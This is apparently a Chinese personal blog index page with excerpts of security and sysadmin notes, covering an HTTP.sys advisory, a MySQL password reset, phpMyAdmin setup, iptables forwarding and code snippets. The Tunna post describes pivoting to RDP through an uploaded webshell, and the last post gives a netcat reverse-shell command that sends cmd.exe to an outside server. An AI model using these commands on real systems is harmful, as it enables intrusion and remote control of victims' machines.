Something.

[该文章已设置加密,请点击标题输入密码访问]

HTTP.sys 远程代码执行

在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行漏洞危害非常大,请广大用户注意。 漏洞信息 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 危害评级 严重 影响范围 影响...

阅读全文>>

Linux下安装PhpMyAdmin

kali下,用命令行查看数据略蛋疼,所以还是安装个phpmyadmin吧.方法比较简单,安装过程还是很顺利的. 1.下载phpmyadmin wget http://nchc.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.3.10/phpMyAdmin-3.3.10-all-languages.tar.gz 2.解压 tar xvfz phpMyAdmin-3.3.10-all-languages.tar.gz 3.改名并移动到apach...

阅读全文>>

Mysql忘记密码

虽然和mysql打交道这么长时间,以前也忘记过密码,不过要在linux下命令操作,还是有些生疏,于是翻了翻资料,记录下来 1.停止mysql service mysql stop 2.设置跳过验证 mysqld_safe --skip-grant-tables 3.再开个终端 root@linux: mysql mysql > use mysql; mysql > updata user set password=password(...

阅读全文>>

Tunna内网转发

Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l ...

阅读全文>>

Linux & Win 文件内容搜索命令

有时候我们想快速找到某个目录或某个盘符下哪个文件里面存在指定的字符串,可以使用如下命令: win: findstr /s /i /n /d:D:\ "hahaha" *.txt    //寻找D盘下所有包含hahaha的txt文件 linux: find /var/www -name "*.*" | xargs grep "pass"   //从www目录开始查找所有包含pass的文件 记录备用.

阅读全文>>

Python 抓取虾米歌曲名

# -*- coding:utf8 -*- import httplib def txt_wrap_by(start_str, end, html): start = html.find(start_str) if start >= 0: start += len(start_str) end = html.find(end, start) if end >= 0: return html[start:end].strip() def getones(sid): h...

阅读全文>>

C# Linq 统计ArrayList中相同元素出现的次数

System.Collections.ArrayList aList = new System.Collections.ArrayList(); aList.Add("b"); aList.Add("a"); aList.Add("o"); aList.Add("b"); aList.Add("a"); aList.Add("o"); aList.Add("s"); aList.Add("b"); string result=""; var vs = from char p in pre group p by p into g select new { g, num = g...

阅读全文>>

Linux 用iptables转发内网的服务

仅仅只Linux nc反弹无法满足于某些功能...So,Start 因为我的vps没有买多IP,所以无法达到搭建VPN,然后拨上去就是公网IP的状态 公网IP用来干嘛?你懂的- -.. 于是问了两个好基友,说只要把vps接收到的数据用iptables转发到拨上的vpn的内网机器就好了。(我在vps上搭建了openvpn,我用win拨上去查看IP是内网IP,类似10.10.10.6这种(因为只买了一个IP..)) 记录: 1.iptables配置脚本 iptables -t nat -A PREROUTING ...

阅读全文>>

Linux nc监听反弹

Linux下安装nc完毕后,顺便试试反弹.. 1.在外网服务器监听端口 ./netcat -vv -l -p 6666 2.在win或webshell进行反弹 nc -vv 0.0.0.0 6666 -e C:\Windows\System32\cmd.exe (0.0.0.0 >> 外网服务器IP) 3.如图 点击看大图

阅读全文>>